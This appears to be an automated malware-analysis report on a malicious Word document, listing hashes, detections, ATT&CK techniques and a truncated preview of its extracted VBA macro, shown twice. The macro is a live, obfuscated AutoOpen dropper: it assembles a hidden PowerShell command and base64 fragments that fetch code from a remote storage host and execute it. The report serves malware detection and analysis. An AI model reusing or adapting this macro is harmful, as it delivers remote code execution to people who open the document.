Office (OLE) malware analysis — malicious · 4485082f8aa42759

MALICIOUS

Office (OLE)

267.5 KB Created: 2018-03-08 21:46:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: 80a9ad619088f71af3aa690d92e9ba62 SHA-1: 7ebd82b8d09266bd19b1254b38cf1fbbac06a18e SHA-256: 4485082f8aa42759e213506b74d8ab2f3b8ec6b81a8155496ffbadaec7a254bc

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Word document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, a critical indicator of malicious activity, suggesting it's designed to download and execute a secondary payload. The ClamAV detection further confirms its malicious nature.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6467497-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6467497-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5892 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5892 bytes
SHA-256: `9659df118ba9b65e14335f5ff77d53925af078e626a434a472b8d7873aaaaa43`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "upd" Sub AutoOpen() Dim CT_OG As String IN_QE = Array("e", "u", "-", "o", "w", "t", "s", "y", "d", " ", "x", "p", "r", "l", "n", "i", "b", "a", "c", "h") Dim BN_QJ As String BN_QJ = "ZgB1AG4AYwB0AGkA" CT_OG = CT_OG + IN_QE(11) CT_OG = CT_OG + IN_QE(3) Dim JP_RB As String JP_RB = "bwBuACAAYQAoACQAeAApAHsAcgBl" CT_OG = CT_OG + IN_QE(4) CT_OG = CT_OG + IN_QE(0) Dim FN_SJ As String FN_SJ = "AHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA" CT_OG = CT_OG + IN_QE(12) CT_OG = CT_OG + IN_QE(6) Dim FQ_KI As String FQ_KI = "uAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4" CT_OG = CT_OG + IN_QE(19) CT_OG = CT_OG + IN_QE(0) Dim FR_KJ As String FR_KJ = "ARwBlAHQAUwB0AHIAaQBuAG" AT_RH = AT_RH & BN_QJ & JP_RB & FN_SJ & FQ_KI & FR_KJ CT_OG = CT_OG + IN_QE(13) CT_OG = CT_OG + IN_QE(13) Dim ET_NB As String ET_NB = "cAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdA" CT_OG = CT_OG + IN_QE(9) CT_OG = CT_OG + IN_QE(2) Dim FR_RD As String FR_RD = "DoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAb" CT_OG = CT_OG + IN_QE(4) CT_OG = CT_OG + IN_QE(15) Dim GT_SF As String GT_SF = "gBnACgAJAB4ACkAKQB9ADsAaQBlAHgAIAAkA" CT_OG = CT_OG + IN_QE(14) CT_OG = CT_OG + IN_QE(8) Dim EM_NH As String EM_NH = "CgAYQAgACQAKAAkACgAJAAo" CT_OG = CT_OG + IN_QE(3) CT_OG = CT_OG + IN_QE(4) Dim JM_RE As String JM_RE = "AGkAbgB2AG" AT_RH = AT_RH & ET_NB & FR_RD & GT_SF & EM_NH & JM_RE CT_OG = CT_OG + IN_QE(6) CT_OG = CT_OG + IN_QE(5) Dim CQ_KB As String CQ_KB = "8AawBlAC0AdwBlAGIAcgBlAHEAdQBlAHMAdA" CT_OG = CT_OG + IN_QE(7) CT_OG = CT_OG + IN_QE(13) Dim CL_SE As String CL_SE = "AgACcAaAB" CT_OG = CT_OG + IN_QE(0) CT_OG = CT_OG + IN_QE(9) Dim IL_SI As String IL_SI = "0AHQAcABzADoALwAvAHUAcwBwAHIAZAA1ADEANQAwAGMA" CT_OG = CT_OG + IN_QE(19) CT_OG = CT_OG + IN_QE(15) Dim BL_PG As String BL_PG = "ZQBuAHQAcgBhAGwALgB0AGEAYgBsAGUALgBjA" CT_OG = CT_OG + IN_QE(8) CT_OG = CT_OG + IN_QE(8) Dim IS_MH As String IS_MH = "G8AcgBlAC4AdwBpAG4AZABvAHcAcwAuAG4AZQB0AC8Adw" AT_RH = AT_RH & CQ_KB & CL_SE & IL_SI & BL_PG & IS_MH CT_OG = CT_OG + IN_QE(0) CT_OG = CT_OG + IN_QE(14) Dim ES_MF As String ES_MF = "BhAHIAZQBoAG8A" CT_OG = CT_OG + IN_QE(9) CT_OG = CT_OG + IN_QE(2) Dim HM_OC As String HM_OC = "dQBzAGUAPwAkAGYAaQBsAHQAZ" CT_OG = CT_OG + IN_QE(0) CT_OG = CT_OG + IN_QE(10) Dim FL_NB As String FL_NB = "QByAD0AUABhAHIAdABpAHQAaQBvAG4ASwBlAHkAJQAyADAA" CT_OG = CT_OG + IN_QE(0) CT_OG = CT_OG + IN_QE(18) Dim DR_MH As String DR_MH = "ZQBxACUAMgAwACUAMgA3AHMAdABh" CT_OG = CT_OG + IN_QE(1) CT_OG = CT_OG + IN_QE(5) Dim CM_OC As String CM_OC = "AGcAZQAlADIANwAmACQAUwBlAGwA" AT_RH = AT_RH & ES_MF & HM_OC & FL_NB & DR_MH & CM_OC CT_OG = CT_OG + IN_QE(15) CT_OG = CT_OG + IN_QE(3) Dim GP_RF As String GP_RF = "ZQBjAHQAPQBkAGEAdABhACYAcwB2AD0AMgAwA" CT_OG = CT_OG + IN_QE(14) CT_OG = CT_OG + IN_QE(11) Dim FM_PD As String FM_PD = "DEANwAtADAANAAtADEANwAmAHMAcwA9AGI" CT_OG = CT_OG + IN_QE(3) CT_OG = CT_OG + IN_QE(13) Dim HM_MH As String HM_MH = "AZgBxAHQAJgBzAHIAdAA9AHMAYwBvACYAcwBwAD0AcgB3AG" CT_OG = CT_OG + IN_QE(15) CT_OG = CT_OG + IN_QE(18) Dim FQ_SC As String FQ_SC = "QAbABhAGMA" CT_OG = CT_OG + IN_QE(7) CT_OG = CT_OG + IN_QE(9) Dim DO_PG As String DO_PG = "dQBwACYAcwBlAD0AMgAwADEAN" AT_RH = AT_RH & GP_RF & FM_PD & HM_MH & FQ_SC & DO_PG CT_OG = CT_OG + IN_QE(16) CT_OG = CT_OG + IN_QE(7) ... (truncated)

SHA-256: 9659df118ba9b65e14335f5ff77d53925af078e626a434a472b8d7873aaaaa43

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "upd"
Sub AutoOpen()
    Dim CT_OG As String
    IN_QE = Array("e", "u", "-", "o", "w", "t", "s", "y", "d", " ", "x", "p", "r", "l", "n", "i", "b", "a", "c", "h")
    Dim BN_QJ As String
    BN_QJ = "ZgB1AG4AYwB0AGkA"
    CT_OG = CT_OG + IN_QE(11)
    CT_OG = CT_OG + IN_QE(3)
    Dim JP_RB As String
    JP_RB = "bwBuACAAYQAoACQAeAApAHsAcgBl"
    CT_OG = CT_OG + IN_QE(4)
    CT_OG = CT_OG + IN_QE(0)
    Dim FN_SJ As String
    FN_SJ = "AHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA"
    CT_OG = CT_OG + IN_QE(12)
    CT_OG = CT_OG + IN_QE(6)
    Dim FQ_KI As String
    FQ_KI = "uAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4"
    CT_OG = CT_OG + IN_QE(19)
    CT_OG = CT_OG + IN_QE(0)
    Dim FR_KJ As String
    FR_KJ = "ARwBlAHQAUwB0AHIAaQBuAG"
    AT_RH = AT_RH & BN_QJ & JP_RB & FN_SJ & FQ_KI & FR_KJ
    CT_OG = CT_OG + IN_QE(13)
    CT_OG = CT_OG + IN_QE(13)
    Dim ET_NB As String
    ET_NB = "cAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdA"
    CT_OG = CT_OG + IN_QE(9)
    CT_OG = CT_OG + IN_QE(2)
    Dim FR_RD As String
    FR_RD = "DoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAb"
    CT_OG = CT_OG + IN_QE(4)
    CT_OG = CT_OG + IN_QE(15)
    Dim GT_SF As String
    GT_SF = "gBnACgAJAB4ACkAKQB9ADsAaQBlAHgAIAAkA"
    CT_OG = CT_OG + IN_QE(14)
    CT_OG = CT_OG + IN_QE(8)
    Dim EM_NH As String
    EM_NH = "CgAYQAgACQAKAAkACgAJAAo"
    CT_OG = CT_OG + IN_QE(3)
    CT_OG = CT_OG + IN_QE(4)
    Dim JM_RE As String
    JM_RE = "AGkAbgB2AG"
    AT_RH = AT_RH & ET_NB & FR_RD & GT_SF & EM_NH & JM_RE
    CT_OG = CT_OG + IN_QE(6)
    CT_OG = CT_OG + IN_QE(5)
    Dim CQ_KB As String
    CQ_KB = "8AawBlAC0AdwBlAGIAcgBlAHEAdQBlAHMAdA"
    CT_OG = CT_OG + IN_QE(7)
    CT_OG = CT_OG + IN_QE(13)
    Dim CL_SE As String
    CL_SE = "AgACcAaAB"
    CT_OG = CT_OG + IN_QE(0)
    CT_OG = CT_OG + IN_QE(9)
    Dim IL_SI As String
    IL_SI = "0AHQAcABzADoALwAvAHUAcwBwAHIAZAA1ADEANQAwAGMA"
    CT_OG = CT_OG + IN_QE(19)
    CT_OG = CT_OG + IN_QE(15)
    Dim BL_PG As String
    BL_PG = "ZQBuAHQAcgBhAGwALgB0AGEAYgBsAGUALgBjA"
    CT_OG = CT_OG + IN_QE(8)
    CT_OG = CT_OG + IN_QE(8)
    Dim IS_MH As String
    IS_MH = "G8AcgBlAC4AdwBpAG4AZABvAHcAcwAuAG4AZQB0AC8Adw"
    AT_RH = AT_RH & CQ_KB & CL_SE & IL_SI & BL_PG & IS_MH
    CT_OG = CT_OG + IN_QE(0)
    CT_OG = CT_OG + IN_QE(14)
    Dim ES_MF As String
    ES_MF = "BhAHIAZQBoAG8A"
    CT_OG = CT_OG + IN_QE(9)
    CT_OG = CT_OG + IN_QE(2)
    Dim HM_OC As String
    HM_OC = "dQBzAGUAPwAkAGYAaQBsAHQAZ"
    CT_OG = CT_OG + IN_QE(0)
    CT_OG = CT_OG + IN_QE(10)
    Dim FL_NB As String
    FL_NB = "QByAD0AUABhAHIAdABpAHQAaQBvAG4ASwBlAHkAJQAyADAA"
    CT_OG = CT_OG + IN_QE(0)
    CT_OG = CT_OG + IN_QE(18)
    Dim DR_MH As String
    DR_MH = "ZQBxACUAMgAwACUAMgA3AHMAdABh"
    CT_OG = CT_OG + IN_QE(1)
    CT_OG = CT_OG + IN_QE(5)
    Dim CM_OC As String
    CM_OC = "AGcAZQAlADIANwAmACQAUwBlAGwA"
    AT_RH = AT_RH & ES_MF & HM_OC & FL_NB & DR_MH & CM_OC
    CT_OG = CT_OG + IN_QE(15)
    CT_OG = CT_OG + IN_QE(3)
    Dim GP_RF As String
    GP_RF = "ZQBjAHQAPQBkAGEAdABhACYAcwB2AD0AMgAwA"
    CT_OG = CT_OG + IN_QE(14)
    CT_OG = CT_OG + IN_QE(11)
    Dim FM_PD As String
    FM_PD = "DEANwAtADAANAAtADEANwAmAHMAcwA9AGI"
    CT_OG = CT_OG + IN_QE(3)
    CT_OG = CT_OG + IN_QE(13)
    Dim HM_MH As String
    HM_MH = "AZgBxAHQAJgBzAHIAdAA9AHMAYwBvACYAcwBwAD0AcgB3AG"
    CT_OG = CT_OG + IN_QE(15)
    CT_OG = CT_OG + IN_QE(18)
    Dim FQ_SC As String
    FQ_SC = "QAbABhAGMA"
    CT_OG = CT_OG + IN_QE(7)
    CT_OG = CT_OG + IN_QE(9)
    Dim DO_PG As String
    DO_PG = "dQBwACYAcwBlAD0AMgAwADEAN"
    AT_RH = AT_RH & GP_RF & FM_PD & HM_MH & FQ_SC & DO_PG
    CT_OG = CT_OG + IN_QE(16)
    CT_OG = CT_OG + IN_QE(7)
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.